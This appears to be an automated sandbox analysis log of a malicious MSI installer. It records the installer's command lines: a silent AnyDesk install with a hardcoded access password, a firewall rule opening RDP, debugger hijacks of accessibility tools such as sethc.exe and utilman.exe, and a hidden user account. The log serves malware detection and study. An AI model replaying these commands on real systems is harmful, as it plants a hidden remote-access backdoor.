Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/$
Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Rem
Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nayuki.io/page/qr-code-generator-library
Source: unknownDNS traffic detected: queries for: boot.net.anydesk.com
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeCode function: 11_2_004013DD CreateFileA,GlobalAlloc,GlobalAlloc,ReadFile,MultiByteToWideChar,MultiByteToWideChar,WSAStartup,socket,connect,send,send,Sleep,recv,shutdown,WSACleanup,
Source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: DirectDrawCreateEx
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\78c342.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\78c341.msiJump to behavior
Source: C:\ProgramData\anydesk.exeCode function: 16_2_01042DFD
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_012A2DFD
Source: eee52229ee24a34cb61191d27a7b66f1.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: C:\Windows\System32\msiexec.exeProcess Stats: CPU usage > 98%
Source: anydesk.exe.11.drStatic PE information: No import functions for PE file found
Source: AnyDesk.exe.16.drStatic PE information: No import functions for PE file found
Source: anydesk.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: anydesk.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AnyDesk.exe.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AnyDesk.exe.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpdr.sys
Source: Joe Sandbox ViewDropped File: C:\ProgramData\anydesk\AnyDesk.exe AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeMemory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk.exeMemory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk.exeMemory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77740000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77620000 page execute and read and write
Source: C:\ProgramData\anydesk\AnyDesk.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77740000 page execute and read and write
Source: 1.msiVirustotal: Detection: 48%
Source: 1.msiReversingLabs: Detection: 30%
Source: C:\Windows\System32\VSSVC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\MUI\Settings
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: ....................@.-..........3B.....(.P.....P........................~......................................................P...............
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: ....................@.-..........3B.....(.P.....P........................~..............................................v.................-.....
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: ......................,..........3......(.P.............................3.........................................................'.......'.....
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: ......................,..........3......(.P.............................9...............................................v.................,.....
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknownProcess created: C:\Windows\System32\VSSVC.exe C:\Windows\system32\vssvc.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k swprv
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk.exe c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: unknownProcess created: C:\ProgramData\anydesk\AnyDesk.exe "C:\ProgramData\AnyDesk\AnyDesk.exe" --service
Source: unknownProcess created: C:\ProgramData\anydesk\AnyDesk.exe "C:\ProgramData\AnyDesk\AnyDesk.exe" --control
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe "c:\programdata\anydesk\anydesk.exe" --get-id
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe "c:\programdata\anydesk\anydesk.exe" --get-id
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk.exe c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Windows\System32\VSSVC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeCode function: 11_2_00401C0B OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,
Source: C:\ProgramData\anydesk.exeFile created: C:\Users\user\AppData\Roaming\AnyDeskJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\~DF0154135B388C6B07.TMPJump to behavior
Source: classification engineClassification label: mal100.evad.winMSI@34/28@4/5
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\msiwrapper.iniJump to behavior
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_connect_queue_2556_539387648_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2856_712703952_0_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2120_827364153_1_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2336_604751762_1_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \BaseNamedObjects\Local\ad_trace_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2336_604751762_0_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2120_827364153_0_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2856_712703952_1_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_707_gsystem_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_trace_mtx
Source: C:\ProgramData\anydesk\AnyDesk.exeMutant created: \BaseNamedObjects\Session\1\ad_mailbox_2120_827364153_1_mtx
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeCode function: 11_2_00401254 CreateDirectoryA,GetModuleHandleA,FindResourceA,LoadResource,SizeofResource,CreateFileA,WriteFile,CloseHandle,WriteFile,
Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\msiwrapper.iniJump to behavior
Source: C:\ProgramData\anydesk\AnyDesk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 1.msiStatic file information: File size 4063232 > 1048576
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-64\privacy_feature\privacy_feature.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: anydesk.exe, 00000010.00000002.1078177888.0000000001C1A000.00000002.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000014.00000002.1170344791.0000000001E7A000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-32\win_dwm\win_dwm.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-64\win_dwm\win_dwm.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-32\privacy_feature\privacy_feature.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: anydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb` source: anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: SAS.pdbR source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: SAS.pdb source: anydesk.exe, 00000010.00000002.1074972510.0000000001AFB000.00000004.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\ProgramData\anydesk.exeUnpacked PE file: 16.2.anydesk.exe.1040000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exeUnpacked PE file: 20.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exeUnpacked PE file: 21.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exeUnpacked PE file: 25.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk\AnyDesk.exeUnpacked PE file: 26.2.AnyDesk.exe.12a0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\anydesk.exeCode function: 16_2_015A9805 push ecx; ret
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01809805 push ecx; ret
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01809805 push ecx; ret
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_01817257 LoadLibraryW,GetProcAddress,GetProcAddress,RtlEncodePointer,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeFile created: C:\programdata\anydesk.exeJump to dropped file
Source: C:\ProgramData\anydesk.exeFile created: C:\ProgramData\anydesk\AnyDesk.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeFile created: C:\programdata\anydesk.exeJump to dropped file
Source: C:\ProgramData\anydesk.exeFile created: C:\ProgramData\anydesk\AnyDesk.exeJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BE8.tmpJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB0A0.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA33.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED31.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BE8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB0A0.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA33.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED31.tmpJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe DebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe DebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe DebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe DebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe DebuggerJump to behavior
Source: C:\Windows\System32\msiexec.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\SystemRestoreJump to behavior
Source: C:\Windows\System32\msiexec.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\VssapiPublisherJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Hides user accounts
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList AdministartorJump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\ProgramData\anydesk.exeFile opened: C:\ProgramData\AnyDesk\AnyDesk.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess information set: NOOPENFILEERRORBOX
